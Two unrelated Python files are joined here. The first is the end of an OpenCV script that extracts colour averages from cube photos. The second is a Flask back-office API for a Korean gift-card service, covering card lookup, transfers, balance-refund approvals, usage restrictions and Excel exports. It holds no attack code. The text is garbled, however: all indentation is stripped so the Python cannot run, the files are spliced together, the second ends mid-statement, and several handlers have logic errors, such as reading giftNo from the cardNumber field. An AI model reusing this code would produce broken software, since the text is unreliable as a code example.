cube_list_all[1].append(cube_list_net[1])
#q.put(cube_list_all[0])
def job3():
for i1 in range (63,91):
path1 = read_picture(i1)
print (path1,end='\n')
cube_list_hsv[2]=[]
cube_list_bgr[2]=[]
cube_list_net[2]=[]
src1=cv.imread(path1)
# if not src1:
# print('error reading picture')
# sys.exit()
cube1_img1=gaussi_blur(src1)
cube1_img2=k_means(cube1_img1)
for x,y in (Outer_frame):
cube_list_hsv[2]=get_averageHSV(cube1_img2,x,y)
cube_list_bgr[2]=get_averageBGR(cube1_img2,x,y)
cube_list_bgr[2]=list(map(int,cube_list_bgr[2]))
cube_list_net[2]=cube_list_hsv[2]+cube_list_bgr[2]
cube_list_all[2].append(cube_list_net[2])
#q.put(cube_list_all[0])
def job4():
for i1 in range (91,166):
path1 = read_picture(i1)
print (path1,end='\n')
cube_list_hsv[3]=[]
cube_list_bgr[3]=[]
cube_list_net[3]=[]
src1=cv.imread(path1)
# if not src1:
# print('error reading picture')
# sys.exit()
cube1_img1=gaussi_blur(src1)
cube1_img2=k_means(cube1_img1)
for x,y in (Outer_frame):
cube_list_hsv[3]=get_averageHSV(cube1_img2,x,y)
cube_list_bgr[3]=get_averageBGR(cube1_img2,x,y)
cube_list_bgr[3]=list(map(int,cube_list_bgr[3]))
cube_list_net[3]=cube_list_hsv[3]+cube_list_bgr[3]
cube_list_all[3].append(cube_list_net[3])
#q.put(cube_list_all[0])
def job5():
for i1 in range (205,304):
path1 = read_picture(i1)
print (path1,end='\n')
cube_list_hsv[4]=[]
cube_list_bgr[4]=[]
cube_list_net[4]=[]
src1=cv.imread(path1)
# if not src1:
# print('error reading picture')
# sys.exit()
cube1_img1=gaussi_blur(src1)
cube1_img2=k_means(cube1_img1)
for x,y in (Outer_frame):
cube_list_hsv[4]=get_averageHSV(cube1_img2,x,y)
cube_list_bgr[4]=get_averageBGR(cube1_img2,x,y)
cube_list_bgr[4]=list(map(int,cube_list_bgr[4]))
cube_list_net[4]=cube_list_hsv[4]+cube_list_bgr[4]
cube_list_all[4].append(cube_list_net[4])
#q.put(cube_list_all[0])
def job6():
for i1 in range (304,416):
path1 = read_picture(i1)
print (path1,end='\n')
cube_list_hsv[5]=[]
cube_list_bgr[5]=[]
cube_list_net[5]=[]
src1=cv.imread(path1)
# if not src1:
# print('error reading picture')
# sys.exit()
cube1_img1=gaussi_blur(src1)
cube1_img2=k_means(cube1_img1)
for x,y in (Outer_frame):
cube_list_hsv[5]=get_averageHSV(cube1_img2,x,y)
cube_list_bgr[5]=get_averageBGR(cube1_img2,x,y)
cube_list_bgr[5]=list(map(int,cube_list_bgr[5]))
cube_list_net[5]=cube_list_hsv[5]+cube_list_bgr[5]
cube_list_all[5].append(cube_list_net[5])
#q.put(cube_list_all[0])
'''
q=Queue()
threads=[]
t1 = threading.Thread(target=job1,name=('t1',))
t2 = threading.Thread(target=job2,name=('t2',))
t3 = threading.Thread(target=job3,name=('t3',))
t4 = threading.Thread(target=job4,name=('t4',))
t5 = threading.Thread(target=job5,name=('t5',))
t6 = threading.Thread(target=job6,name=('t6',))
t1.start()
threads.append(t1)
t2.start()
threads.append(t2)
t3.start()
threads.append(t3)
t4.start()
threads.append(t4)
t5.start()
threads.append(t5)
t6.start()
threads.append(t6)
for thread in threads:
thread.join()
print('all pictures are taken\n')
'''
#every_data_contain_number
#for key in dict_data:
number_of_dict=len(dict_data)
# declare 6 lists used for text storage; json cannot serialize numpy int32, so convert it this way
store_data=[[] for _ in range (number_of_dict)]
# turn these arrays into the list format stored in the dict
for circule_num,value in zip([x for x in range(0,6)],dict_data.values()):
store_data[circule_num] = [[0,0,0,0,0,0] for i in range (len(value))]
for first in range(len(value)):
for two in range(len(value[first])):
store_data[circule_num][first][two]=int(value[first][two])
for json_number in range (6):
file_name="data{0}.json".format(json_number)
with open(file_name,"w") as f:
json.dump(store_data[json_number],f)
f.close()
'''
for i in range(1,29):
path=read_picture(i)
print (path)
listhsv.clear()#清空hsv的tup
listrgb.clear()#清空rgb的tup
listnet.clear()#清空节点的tup
src = cv.imread(path)
while (src is None):
src = cv.imread(path)
if not src:
print('error reading picture')
sys.exit()
main(src)
print(listall)
print ('个数是')
list_num=len(listall)
store = [[0,0,0,0,0,0] for i in range (list_num)]
for list_1 in range(len(listall)):
for list_2 in range(len(listall[list_1])):
store[list_1][list_2]=int(listall[list_1][list_2])
'''
'''
filename='test.json'
with open(filename,'w') as f:
json.dump(store,f)
f.close()
'''
'''
with open('test(副本).txt','w') as f1:
for temp in listall:
print(type(temp[0]))
data='{},{},{},{},{},{}\n'.format(temp[0],temp[1],temp[2],temp[3],temp[4],temp[5])
f1.write(data)
f1.close()
'''
|
cardApi.py
|
# -*- coding:utf-8 -*-
'''
Created on 2017. 4. 26.
@author: sanghyun
'''
import json
import os
import threading
import time
import zipfile
import hashlib
import httplib
import sys
from datetime import datetime
from urllib import urlencode
from urllib2 import HTTPError
from flask import Blueprint, request
from flask.globals import session, current_app
import xlsxwriter
from routes.api.systemMngApi import postBatchMng, putBatchMng
from util.common import getServerUrl, getParameter, getApiData, getData, API_SERVER_KPC_LEGACY, API_SERVER_BACKOFFICE,\
paramEscape, postData, postApiData, postListApiData, putApiData, \
setStringToNumber, parseDate, EXCEL_FILE_MAKE_LIMT_COUNT, \
EXCEL_FILE_DOWNLOAD_COUNT, setUnicodeEncodeTypeToEucKr, setUnicodeFormatToEucKr, getServerUrl, \
request_get, request_post, API_SERVER_BACKOFFICE
cardApi = Blueprint("cardApi", __name__)
@cardApi.route("/api/card/popCard", methods=['GET'])
def popCardMng():
target = getParameter({}, "target")
cardNumber = paramEscape(getParameter({}, "cardNumber"))
giftNo = paramEscape(getParameter({}, "cardNumber"))
if target == "1" :
giftNo = ""
else :
cardNumber = ""
queryData = {
'cardNumber' : cardNumber,
'giftNo' : giftNo
}
result_data = getData("/admin/v1/card" ,queryData , API_SERVER_KPC_LEGACY)
return json.dumps(result_data)
@cardApi.route("/api/card/popCard/popCardTransfer", methods=["POST"])
def popCardTransfer():
form_data = request.json
postcardData = {
"fromCardNumber" : paramEscape(getParameter(form_data,"fromCardNumber")), #String, 보내는 카드번호
"toCardNumber" : paramEscape(getParameter(form_data,"toCardNumber")), #String, 받는 카드번호
"amount" : paramEscape(getParameter(form_data,"amount")) #String, 금액
}
return json.dumps(postData("/admin/v1/card/transfer", {}, postcardData , API_SERVER_KPC_LEGACY))
@cardApi.route("/api/card/cardDealList", methods=["GET"])
def cardDealList():
form_data = json.loads(request.args.get("formData"))
target = getParameter(form_data, "target")
cardNumber = paramEscape(getParameter(form_data, "cardNumber"))
giftNo = paramEscape(getParameter(form_data, "cardNumber"))
if target == "1" :
giftNo = ""
else :
cardNumber = ""
orderType = getParameter(form_data, "orderType")
searchDate = getParameter(form_data , "startDate").split(' - ')
startDate = paramEscape(searchDate[0])
endDate = paramEscape(searchDate[1])
queryData = {
'startDate' : startDate,
'endDate' : endDate,
'cardNumber' : cardNumber,
'giftNo' : giftNo,
'order' : orderType,
'status' : getParameter(form_data, "status"),
'offset' : setStringToNumber(request.args.get("start")),
'limit' : setStringToNumber(request.args.get("length")),
}
result_data = postListApiData("/admin/v1/card/usages/detail" ,queryData , API_SERVER_KPC_LEGACY)
return json.dumps(result_data)
@cardApi.route('/api/card/excelAll', methods=['GET'])
def cardDealExcelAll():
form_data = json.loads(request.args.get("formData"))
target = getParameter(form_data, "target")
cardNumber = paramEscape(getParameter(form_data, "cardNumber"))
giftNo = paramEscape(getParameter(form_data, "cardNumber"))
if target == "1" :
giftNo = ""
else :
cardNumber = ""
orderType = getParameter(form_data, "orderType")
searchDate = getParameter(form_data , "startDate").split(' - ')
startDate = paramEscape(searchDate[0])
endDate = paramEscape(searchDate[1])
queryData = {
'startDate' : startDate,
'endDate' : endDate,
'cardNumber' : cardNumber,
'giftNo' : giftNo,
'order' : orderType,
'status' : getParameter(form_data, "status"),
'offset' : 0,
'limit' : EXCEL_FILE_DOWNLOAD_COUNT,
'empId' : session['empId']
}
rootPath = current_app.root_path
t1 = threading.Thread(target=cardDealExcelFile,args=[queryData,rootPath])
t1.daemon = True
t1.start()
return "엑셀 작업요청"
def cardDealExcelFile(queryData,rootPath):
excelZip = None
jobStatus = 0
batchId = None
try:
fileCnt = 1
makeTime = str(int(round(time.time()*1000)))
uploads = os.path.join(rootPath, "fileDownload" , "excel" , makeTime)
if not os.path.isdir(uploads):
os.makedirs(uploads)
zipFileName = u'카드정보_'+ datetime.now().strftime('%Y%m%d') +'.zip'
        #add the job-start message
batchId = postBatchMng({
"reqId" : queryData['empId'],
"status" : "BAT-0001" , # 진행중
"filePath" : os.path.join(uploads ,zipFileName),
"content" : "카드정보 엑셀 배치작업",
"errMsg" : ""
})["data"]["batchId"]
fileName = '카드정보_' + datetime.now().strftime('%Y%m%d') + '_' + str(fileCnt) + '.xlsx'
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
money_format = workbook.add_format()
money_format.set_num_format('_- #,##0_-;[red]- #,##0_-;_- "-"_-;_-@_-')
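        # Excel custom number format: positive values as "#,##0", negatives in
        # red with a leading "-", zeros rendered as "-", text passed through.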
row = 0
worksheet.write(row, 0 ,"상태")
worksheet.write(row, 1 ,"거래처명")
worksheet.write(row, 2 ,"서비스명")
worksheet.write(row, 3 ,"지불수단")
worksheet.write(row, 4 ,"지불형태")
worksheet.write(row, 5 ,"점포코드")
worksheet.write(row, 6 ,"점포명(사용처)")
worksheet.write(row, 7 ,"POS")
worksheet.write(row, 8 ,"거래번호")
worksheet.write(row, 9 ,"거래일")
worksheet.write(row, 10 ,"거래시간")
worksheet.write(row, 11 ,"거래금액")
worksheet.write(row, 12 ,"결제금액")
worksheet.write(row, 13 ,"할인금액")
worksheet.write(row, 14 ,"잔액")
while True :
result_data = postListApiData("/admin/v1/card/usages/detail" ,queryData , API_SERVER_KPC_LEGACY)
print result_data
for data in result_data["data"]:
row += 1
worksheet.write(row, 0 ,data["status"])
worksheet.write(row, 1 ,data["merchantName"])
worksheet.write(row, 2 ,data["serviceName"])
worksheet.write(row, 3 ,data["payMethod"])
worksheet.write(row, 4 ,data["payType"])
worksheet.write(row, 5 ,data["posCode"])
worksheet.write(row, 6 ,data["posName"])
worksheet.write(row, 7 ,data["pos"])
worksheet.write(row, 8 ,data["orderNo"])
worksheet.write(row, 9 ,parseDate(data["dealDate"] ,'%Y%m%d','%Y-%m-%d'))
worksheet.write(row, 10 ,parseDate(data["dealDate"] + " "+ data["dealTime"] ,'%Y%m%d %H%M%S' ,'%H:%M:%S'))
worksheet.write_number(row, 11 ,long(data["orderAmount"]), money_format)
if(data["dealAmount"]>0) :
worksheet.write_number(row, 12 ,long(data["dealAmount"]), money_format)
else :
worksheet.write(row, 12 ,"-",workbook.add_format({'align':'right'}))
if(data["dcAmount"]>0) :
worksheet.write_number(row, 13 ,long(data["dcAmount"]), money_format)
else :
worksheet.write(row, 13 ,"-",workbook.add_format({'align':'right'}))
worksheet.write(row, 14 ,data["amount"])
queryData["offset"] = queryData["offset"] + EXCEL_FILE_DOWNLOAD_COUNT
if len(result_data["data"]) < EXCEL_FILE_DOWNLOAD_COUNT :
break
workbook.close()
excelZip = zipfile.ZipFile(os.path.join(uploads ,zipFileName),'w')
for folder, subfolders, files in os.walk(uploads):
for file in files:
if file.endswith('.xlsx'):
# excelZip.write(os.path.join(folder ,file), os.path.relpath(os.path.join(folder ,file) , uploads), compress_type=zipfile.ZIP_DEFLATED)
excelZip.write(os.path.join(folder ,file), setUnicodeFormatToEucKr(file), compress_type=zipfile.ZIP_DEFLATED)
except Exception as err:
        #add the error message
putBatchMng({
"batchId" : str(batchId),
"reqId" : queryData['empId'],
"status" : "BAT-0003" , # 진행중
"errMsg" : str(err)
})
jobStatus = 1
print err
finally:
if excelZip != None:
excelZip.close()
if jobStatus == 0 :
putBatchMng({
"batchId" : str(batchId),
"reqId" : queryData['empId'],
"status" : "BAT-0002" , # 진행중
"errMsg" : ""
})
            #add the success message
print "성공"
"""
@cardApi.route("/api/card/refund", methods=["POST"])
def cardRefund():
form_data = request.json
postcardData = {
"cardNumber" : paramEscape(getParameter(form_data,"cardNumber")), #String, 보내는 카드번호
}
return json.dumps(postData("/admin/v1/card/refund", {}, postcardData , API_SERVER_KPC_LEGACY))
"""
#balance refund: request approval
@cardApi.route("/api/card/balanceRefund", methods=["POST"])
def cardbalanceRefund():
form_data = request.json
requestData = {
#"refTitle" : "R2 팝카드 잔액환불", #요청 Title
"refTitle" : getParameter(form_data,"cardNumber"), #승인 목록을 검색하기 위한 Keyword
"workType" : "AWRK-0011", #승인 요청 구분(Code)
"reqType" : "AREQ-0001",
"reqEmpId" : session['empId'], #요청자
"apprEmpId" : getParameter(form_data,"apprEmpId"), #승인자
"reqMemo" : getParameter(form_data,"reqMemo"), #요청 사유
"keyword" : getParameter(form_data,"cardNumber"), #승인 목록을 검색하기 위한 Keyword
"seq" : getParameter(form_data,"seq"), #승인요청 번호
"contentSeq" : getParameter(form_data,"contentSeq"), #승인 data 등록번호
"refId" : getParameter(form_data,"cardNumber"), #중복승인을 막기 위한 고유 검색 Keyword
"contentData" : json.dumps({
"apiUrl" : getServerUrl(API_SERVER_KPC_LEGACY)+"/KpcLegacyApiService/admin/v1/card/refund", #승인 후 처리될 API Url
"cardNumber" : getParameter(form_data,"cardNumber"),
"giftNo" : getParameter(form_data,"giftNo"),
"balance" : paramEscape(getParameter(form_data,"balance")),
"refundCommision" : paramEscape(getParameter(form_data,"refundCommision")),
"customerName" : getParameter(form_data,"customerName"),
"customerTel" : paramEscape(getParameter(form_data,"customerTel")),
"refundBankCode" : getParameter(form_data,"bankCode"),
"refundBankAccountNo" : getParameter(form_data,"bankAccountNo"),
"refundBankHolder" : getParameter(form_data,"bankHolder")
})
}
reponseResult = postApiData("/approval/request/approval", requestData, API_SERVER_BACKOFFICE)
return json.dumps(reponseResult)
#balance refund: modify an approval request
@cardApi.route("/api/card/balanceRefund", methods=["PUT"])
def modifyCardbalanceRefund():
form_data = request.json
requestData = {
#"refTitle" : "R2 팝카드 잔액환불", #요청 Title
"refTitle" : getParameter(form_data,"cardNumber"), #승인 목록을 검색하기 위한 Keyword
"workType" : "AWRK-0011", #승인 요청 구분(Code)
"reqEmpId" : session['empId'], #요청자
"apprEmpId" : getParameter(form_data,"apprEmpId"), #승인자
"reqMemo" : getParameter(form_data,"reqMemo"), #요청 사유
"keyword" : getParameter(form_data,"cardNumber"), #승인 목록을 검색하기 위한 Keyword
"seq" : getParameter(form_data,"seq"), #승인요청 번호
"contentSeq" : getParameter(form_data,"contentSeq"), #승인 data 등록번호
"refId" : getParameter(form_data,"cardNumber"), #중복승인을 막기 위한 고유 검색 Keyword
"contentData" : json.dumps({
"apiUrl" : getServerUrl(API_SERVER_KPC_LEGACY)+"/KpcLegacyApiService/admin/v1/card/refund", #승인 후 처리될 API Url
"cardNumber" : getParameter(form_data,"cardNumber"),
"giftNo" : getParameter(form_data,"giftNo"),
"balance" : paramEscape(getParameter(form_data,"balance")),
"refundCommision" : paramEscape(getParameter(form_data,"refundCommision")),
"customerName" : getParameter(form_data,"customerName"),
"customerTel" : paramEscape(getParameter(form_data,"customerTel")),
"refundBankCode" : getParameter(form_data,"bankCode"),
"refundBankAccountNo" : getParameter(form_data,"bankAccountNo"),
"refundBankHolder" : getParameter(form_data,"bankHolder")
})
}
reponseResult = putApiData("/approval/request/approval", requestData, {}, API_SERVER_BACKOFFICE)
return json.dumps(reponseResult)
#check whether a balance refund request already exists
@cardApi.route('/api/card/<cardNo>/balance-refund/exist', methods=['GET'])
def existBalanceRefund(cardNo):
return json.dumps(request_get("/approvals/request/"+cardNo+"/exist", None, API_SERVER_BACKOFFICE))
#mark a balance refund as not refundable
@cardApi.route('/api/card/balance-refund/rejection', methods=['POST'])
def rejectBalanceRefund():
formData = request.json
rejectData = {
'refundSeqList': formData.get('sequenceList'),
'rejectEmpId': session['empId'],
'refundRejectionMemo': formData.get('rejectRefundMemo'),
}
resultData = request_post("/card/balance-refund/rejection", rejectData, API_SERVER_BACKOFFICE)
return json.dumps(resultData)
#set/clear a card usage restriction
@cardApi.route("/api/card/restrict", methods=['POST'])
def cardRestrict():
    #set the restriction
form_data = request.json
if paramEscape(form_data["restrictYN"])=="Y":
requestData = {
'giftNo' : paramEscape(form_data["giftNo"]),
'cardNumber' : paramEscape(form_data["cardNumber"]),
'insertAdminId' : paramEscape(session["empId"]),
'restrictYN' : paramEscape(form_data["restrictYN"]),
'restrictDesc' : paramEscape(form_data["desc2"])
}
result_data = postData("/admin/v1/card/restrict" ,{}, requestData , API_SERVER_KPC_LEGACY)
    #clear the restriction
elif paramEscape(form_data["restrictYN"])=="N":
requestData = {
#"refTitle" : "R2 팝카드 사용제한 해제", #요청 Title
"refTitle" : getParameter(form_data,"cardNumber"), #승인 목록을 검색하기 위한 Keyword
"workType" : "AWRK-0012", #승인 요청 구분(Code)
"reqType" : "AREQ-0005", #요청자
"reqEmpId" : session['empId'], #요청구분
"apprEmpId" : getParameter(form_data,"apprEmpId"), #승인자
"reqMemo" : getParameter(form_data,"desc2"), #요청 사유
"keyword" : getParameter(form_data,"cardNumber"), #승인 목록을 검색하기 위한 Keyword
"contentSeq" : getParameter(form_data,"contentSeq"), #승인 data 등록번호
"refId" : getParameter(form_data,"cardNumber"), #중복승인을 막기 위한 고유 검색 Keyword
"contentData" : json.dumps({
"apiUrl" : getServerUrl(API_SERVER_KPC_LEGACY)+"/KpcLegacyApiService/admin/v1/card/restrict", #승인 후 처리될 API Url
"giftNo" : paramEscape(form_data["giftNo"]),
"cardNumber" : paramEscape(form_data["cardNumber"]),
"insertAdminId" : paramEscape(session["empId"]),
"restrictYN" : paramEscape(form_data["restrictYN"]),
"restrictDesc" : paramEscape(form_data["desc2"])
})
}
result_data = postApiData("/approval/request/approval" , requestData , API_SERVER_BACKOFFICE)
return json.dumps(result_data)
#modify a card usage restriction set/clear request
@cardApi.route("/api/card/restrict", methods=['PUT'])
def cardRestrictModify():
    #set the restriction
form_data = request.json
if paramEscape(form_data["restrictYN"])=="Y":
requestData = {
'giftNo' : paramEscape(form_data["giftNo"]),
'cardNumber' : paramEscape(form_data["cardNumber"]),
'insertAdminId' : paramEscape(session["empId"]),
'restrictYN' : paramEscape(form_data["restrictYN"]),
'restrictDesc' : paramEscape(form_data["desc2"])
}
result_data = postData("/admin/v1/card/restrict" ,{}, requestData , API_SERVER_KPC_LEGACY)
    #clear the restriction
elif paramEscape(form_data["restrictYN"])=="N":
requestData = {
#"refTitle" : "R2 팝카드 사용제한 해제", #요청 Title
"refTitle" : getParameter(form_data,"cardNumber"), #승인 목록을 검색하기 위한 Keyword
"workType" : "AWRK-0012", #승인 요청 구분(Code)
"reqType" : "AREQ-0005", #요청자
"reqEmpId" : session['empId'], #요청구분
"apprEmpId" : getParameter(form_data,"apprEmpId"), #승인자
"reqMemo" : getParameter(form_data,"desc2"), #요청 사유
"keyword" : getParameter(form_data,"cardNumber"), #승인 목록을 검색하기 위한 Keyword
"seq" : getParameter(form_data,"seq"), #승인요청 번호
"contentSeq" : getParameter(form_data,"contentSeq"), #승인 data 등록번호
"refId" : getParameter(form_data,"cardNumber"), #중복승인을 막기 위한 고유 검색 Keyword
"contentData" : json.dumps({
"apiUrl" : getServerUrl(API_SERVER_KPC_LEGACY)+"/KpcLegacyApiService/admin/v1/card/restrict", #승인 후 처리될 API Url
"giftNo" : paramEscape(form_data["giftNo"]),
"cardNumber" : paramEscape(form_data["cardNumber"]),
"insertAdminId" : paramEscape(session["empId"]),
"restrictYN" : paramEscape(form_data["restrictYN"]),
"restrictDesc" : paramEscape(form_data["desc2"])
})
}
result_data = putApiData("/approval/request/approval" ,requestData ,{} , API_SERVER_BACKOFFICE)
return json.dumps(result_data)
@cardApi.route("/api/card/balanceRefund/detail", methods=['GET'])
def balanceRefundDetail():
seq = json.loads(request.args.get("seq"))
queryData = {
"seq" : seq
}
print(seq)
result_data = getApiData("/card/approveCardBalnaceRefund" ,queryData , API_SERVER_BACKOFFICE)
return json.dumps(result_data)
@cardApi.route("/api/card/balanceRefund/list", methods=['GET'])
def balanceRefundList():
form_data = json.loads(request.args.get("formData"))
searchDate = getParameter(form_data , "searchDate").split(' - ')
startDate = paramEscape(searchDate[0])
endDate = paramEscape(searchDate[1])
queryData = {
'cardNumber' : getParameter(form_data, "cardNumber"),
'customerName' : getParameter(form_data,"customerName"),
'dateType' : getParameter(form_data, "dateType"),
'startDate' : startDate,
'endDate' : endDate,
'dateOrderType': getParameter(form_data, "dateOrderType"),
'dateOrderDesc': getParameter(form_data, "dateOrderDesc"),
'procStatus' : getParameter(form_data, "procStatus"),
'offset' : setStringToNumber(getParameter({},"start")),
'limit' : setStringToNumber(getParameter({},"length"))
}
result_data = getApiData("/card/approveCardBalnaceRefunds" ,queryData , API_SERVER_BACKOFFICE)
return json.dumps(result_data)
@cardApi.route("/api/card/balanceRefund/list/excel", methods=['GET'])
def balanceRefundListExcel():
form_data = json.loads(request.args.get("formData"))
searchDate = getParameter(form_data , "searchDate").split(' - ')
startDate = paramEscape(searchDate[0])
endDate = paramEscape(searchDate[1])
queryData = {
'cardNumber' : getParameter(form_data, "cardNumber"),
'customerName' : getParameter(form_data,"customerName"),
'dateType' : getParameter(form_data, "dateType"),
'startDate' : startDate,
'endDate' : endDate,
'dateOrderType': getParameter(form_data, "dateOrderType"),
'dateOrderDesc': getParameter(form_data, "dateOrderDesc"),
'procStatus' : getParameter(form_data, "procStatus"),
'offset' : setStringToNumber(getParameter({},"start")),
'limit' : setStringToNumber(getParameter({},"length")),
'excelAllFlag':'1',
'empId' : session['empId']
}
rootPath = current_app.root_path
t1 = threading.Thread(target=cardRefundExcelFile,args=[queryData,rootPath])
t1.daemon = True
t1.start()
return "엑셀 작업요청"
#complete the balance refund
@cardApi.route("/api/card/balanceRefund/approve", methods=["POST"])
def cardbalanceRefundApprove():
form_data = request.json
approvalData = {
'refundList' : form_data,
'empId': session['empId']
}
resultData = request_post("/card/CardBalnaceRefund/approve", approvalData, API_SERVER_BACKOFFICE)
return json.dumps(resultData)
#reject the balance refund
@cardApi.route("/api/card/balanceRefund/reject", methods=["POST"])
def cardbalanceRefundReject():
form_data = request.json
print(form_data)
approvalData = {
'refundList' : getParameter(form_data, "refundList"),
'reqMemo' : getParameter(form_data, "refundDesc"),
'empId': session['empId']
}
resultData = request_post("/card/CardBalnaceRefund/reject", approvalData, API_SERVER_BACKOFFICE)
return json.dumps(resultData)
@cardApi.route("/api/card/usages", methods=['GET'])
def usages():
form_data = json.loads(request.args.get("formData"))
searchDate = getParameter(form_data , "searchDate").split(' - ')
startDate = paramEscape(searchDate[0]).split(" ")[0]
startTime = paramEscape(searchDate[0]).split(" ")[1] + "00"
endDate = paramEscape(searchDate[1]).split(" ")[0]
endTime = paramEscape(searchDate[1]).split(" ")[1] + "59"
target = getParameter(form_data, "target")
cardNumber = paramEscape(getParameter(form_data, "cardNumber"))
queryData = {
'cardNumber' : target == "1" and cardNumber or "",
'orderNo' : target == "2" and cardNumber or "",
'serviceId' : target == "3" and cardNumber or "",
'startGiftNo' : paramEscape(getParameter(form_data, "startGiftNo")),
'endGiftNo' : paramEscape(getParameter(form_data, "endGiftNo")),
'amount' : paramEscape(getParameter(form_data, "amount")),
'merchantName' : getParameter(form_data, "merchantName"),
'dateType' : getParameter(form_data, "dateType"),
'startDate' : startDate,
'startTime' : startTime,
'endDate' : endDate,
'endTime' : endTime,
'storeName' : getParameter(form_data,"storeName"),
'storeCode' : getParameter(form_data,"storeCode"),
'status' : getParameter(form_data, "status"),
'payKind' : getParameter(form_data, "payKind"),
'payMethod' : getParameter(form_data, "payMethod"),
'order' : getParameter(form_data, "order"),
'offset' : setStringToNumber(getParameter({},"start")),
'limit' : setStringToNumber(getParameter({},"length"))
}
result_data = postListApiData("/admin/v1/card/usages" ,queryData , API_SERVER_KPC_LEGACY)
return json.dumps(result_data)
@cardApi.route('/api/card/usages/excel', methods=['GET'])
def usagesExcelAll():
form_data = {}
searchDate = getParameter(form_data , "searchDate").split(' - ')
startDate = paramEscape(searchDate[0]).split(" ")[0]
startTime = paramEscape(searchDate[0]).split(" ")[1] + "00"
endDate = paramEscape(searchDate[1]).split(" ")[0]
endTime = paramEscape(searchDate[1]).split(" ")[1] + "59"
target = getParameter(form_data, "target")
cardNumber = paramEscape(getParameter(form_data, "cardNumber"))
queryData = {
'cardNumber' : target == "1" and cardNumber or "",
'orderNo' : target == "2" and cardNumber or "",
'serviceId' : target == "3" and cardNumber or "",
'startGiftNo' : paramEscape(getParameter(form_data, "startGiftNo")),
'endGiftNo' : paramEscape(getParameter(form_data, "endGiftNo")),
'amount' : paramEscape(getParameter(form_data, "amount")),
'merchantName' : getParameter(form_data, "merchantName"),
'dateType' : getParameter(form_data, "dateType"),
'startDate' : startDate,
'startTime' : startTime,
'endDate' : endDate,
'endTime' : endTime,
'storeName' : getParameter(form_data,"storeName"),
'storeCode' : getParameter(form_data,"storeCode"),
'status' : getParameter(form_data, "status"),
'payKind' : getParameter(form_data, "payKind"),
'payMethod' : getParameter(form_data, "payMethod"),
'order' : getParameter(form_data, "order"),
'offset' : 0,
'limit' : EXCEL_FILE_DOWNLOAD_COUNT,
'empId' : session['empId']
}
rootPath = current_app.root_path
t1 = threading.Thread(target=cardExcelFile,args=[queryData,rootPath])
t1.daemon = True
t1.start()
return "엑셀 작업요청"
def cardExcelFile(queryData,rootPath):
excelZip = None
jobStatus = 0
batchId = None
try:
fileCnt = 1
makeTime = str(int(round(time.time()*1000)))
uploads = os.path.join(rootPath, "fileDownload" , "excel" , makeTime)
if not os.path.isdir(uploads):
os.makedirs(uploads)
zipFileName = u'카드정보_'+ datetime.now().strftime('%Y%m%d') +'.zip'
        #add the job-start message
batchId = postBatchMng({
"reqId" : queryData['empId'],
"status" : "BAT-0001" , # 진행중
"filePath" : os.path.join(uploads ,zipFileName),
"content" : "카드정보 엑셀 배치작업",
"errMsg" : ""
})["data"]["batchId"]
fileName = '카드정보_' + datetime.now().strftime('%Y%m%d') + '_' + str(fileCnt) + '.xlsx'
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
money_format = workbook.add_format()
money_format.set_num_format('_- #,##0_-;[red]- #,##0_-;_- "-"_-;_-@_-')
row = 0
worksheet.write(row, 0 ,"거래처명")
worksheet.write(row, 1 ,"서비스명")
worksheet.write(row, 2 ,"점포코드")
worksheet.write(row, 3 ,"점포명(사용처)")
worksheet.write(row, 4 ,"구분")
worksheet.write(row, 5 ,"지불수단")
worksheet.write(row, 6 ,"지불형태")
worksheet.write(row, 7 ,"영업일")
worksheet.write(row, 8 ,"거래일")
worksheet.write(row, 9 ,"거래시간")
worksheet.write(row, 10 ,"거래번호")
worksheet.write(row, 11 ,"승인번호")
worksheet.write(row, 12 ,"금액")
worksheet.write(row, 13 ,"사용카드번호")
while True :
result_data = postListApiData("/admin/v1/card/usages" ,queryData , API_SERVER_KPC_LEGACY)
for data in result_data["data"]:
row += 1
worksheet.write(row, 0 ,data["merchantName"])
worksheet.write(row, 1 ,data["serviceName"])
worksheet.write(row, 2 ,data["posCode"])
worksheet.write(row, 3 ,data["posName"])
worksheet.write(row, 4 ,data["payStatus"])
worksheet.write(row, 5 ,data["payMethod"])
worksheet.write(row, 6 ,data["payType"])
worksheet.write(row, 7 ,parseDate(data["businessDate"] ,'%Y%m%d' ,'%Y-%m-%d'))
worksheet.write(row, 8 ,parseDate(data["approvalDate"] ,'%Y%m%d%H%M%S' ,'%Y-%m-%d'))
worksheet.write(row, 9 ,parseDate(data["approvalDate"] , '%Y%m%d%H%M%S', '%H:%M:%S'))
worksheet.write(row, 10 ,data["orderNo"])
worksheet.write(row, 11 ,data["approvalNo"])
worksheet.write_number(row, 12 ,long(data["amount"]), money_format)
worksheet.write(row, 13 ,data["cardNumber"])
if row >= EXCEL_FILE_MAKE_LIMT_COUNT :
row = 0
fileCnt += 1
fileName = '카드정보_' + datetime.now().strftime('%Y%m%d') + '_' + str(fileCnt) + '.xlsx'
                    # recreate the file once (DB fetch count * 2) rows have been written
workbook.close()
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
worksheet.write(row, 0 ,"거래처명")
worksheet.write(row, 1 ,"서비스명")
worksheet.write(row, 2 ,"점포코드")
worksheet.write(row, 3 ,"점포명(사용처)")
worksheet.write(row, 4 ,"구분")
worksheet.write(row, 5 ,"지불수단")
worksheet.write(row, 6 ,"지불형태")
worksheet.write(row, 7 ,"영업일")
worksheet.write(row, 8 ,"거래일")
worksheet.write(row, 9 ,"거래시간")
worksheet.write(row, 10 ,"거래번호")
worksheet.write(row, 11 ,"승인번호")
worksheet.write(row, 12 ,"금액")
worksheet.write(row, 13 ,"사용카드번호")
queryData["offset"] = queryData["offset"] + EXCEL_FILE_DOWNLOAD_COUNT
if len(result_data["data"]) < EXCEL_FILE_DOWNLOAD_COUNT :
break
workbook.close()
excelZip = zipfile.ZipFile(os.path.join(uploads ,zipFileName),'w')
for folder, subfolders, files in os.walk(uploads):
for file in files:
if file.endswith('.xlsx'):
excelZip.write(os.path.join(folder ,file), setUnicodeFormatToEucKr(file), compress_type=zipfile.ZIP_DEFLATED)
except Exception as err:
        #add the error message
putBatchMng({
"batchId" : str(batchId),
"reqId" : queryData['empId'],
"status" : "BAT-0003" , # 진행중
"errMsg" : str(err)
})
jobStatus = 1
print("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
print err
finally:
if excelZip != None:
